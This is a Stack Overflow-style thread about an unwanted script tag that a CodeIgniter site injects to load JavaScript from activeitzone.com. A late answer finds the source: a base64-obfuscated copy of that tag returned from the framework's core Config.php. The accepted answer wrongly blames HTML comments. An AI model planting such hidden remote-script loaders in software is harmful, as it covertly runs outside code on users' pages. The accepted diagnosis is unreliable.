# Remove a line of code before view in CodeIgniter

Tags: javascript, php, jquery, codeigniter

I have a script in codeigniter which includes a line of code automatically I have tried to remove it so long but it's no removing

```
<script>$(function(){$.getScript("https://activeitzone.com/check/shop.js");});</script>
```

This line of automatically including at the end of page and out of  tag.

You can see it through this link http://phpstack-31179-70602-209023.cloudwaysapps.com/

Comment: inside your code there is commented line  <!--<!-- JS Implementing Plugins -->-->    remove starting <!-- and ending -->

Comment: Sorry I don't understand .. Could you please clear it more...

Comment: do you have separate footer. If so go to your footer file at the end add -->

Comment: you have use extra --> in your code which is showing at the end.. i dont know in which file you use but the line where you use is  <!--<!-- JS Implementing Plugins -->-->..search in your project for this line and remove extra <!-- and -->

Comment: Check this thread:
https://stackoverflow.com/questions/42565930/remove-script-code-from-codeigniter

Answer (score 1, accepted):

This is what you have done in the end part..

```
<!--[if lt IE 9]>
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/plugins/respond.js"></script>
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/plugins/html5shiv.js"></script>
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/js/plugins/placeholder-IE-fixes.js"></script>
<![endif]-->

<!---

<script>$(function(){$.getScript("https://activeitzone.com/check/shop.js");});</script>
```

Change this to

```
<!--[if lt IE 9]
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/plugins/respond.js"></script>
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/plugins/html5shiv.js"></script>
    <script src="http://phpstack-31179-70602-209023.cloudwaysapps.com/template/front/assets/js/plugins/placeholder-IE-fixes.js"></script>-->
<!--[endif]-->



<!--<script>$(function(){$.getScript("https://activeitzone.com/check/shop.js");});</script>-->
```

Comment: `<script>$(function(){$.getScript("https://activeitzone.com/check/shop.js");});</script>` --> I haven't find this line in my footer

Comment: @HossainAzad-haha i think you removed it from your site.

Comment: Check this thread:
https://stackoverflow.com/questions/42565930/remove-script-code-from-codeigniter

Answer (score -1):

```
C:\xampp\htdocs\grocerynew\system\core\Config.php:
  216       // if ($index == '')
  217       // {
  218:      //  return base64_decode('PHNjcmlwdD4kKGZ1bmN0aW9uKCl7JC5nZXRTY3JpcHQoImh0dHBzOi8vYWN0aXZlaXR6b25lLmNvbS9jaGVjay9zaG9wLmpzIik7fSk7PC9zY3JpcHQ+');
  219       // }
  220   }
```

Comment: Please reformat your code and tell us how this helps.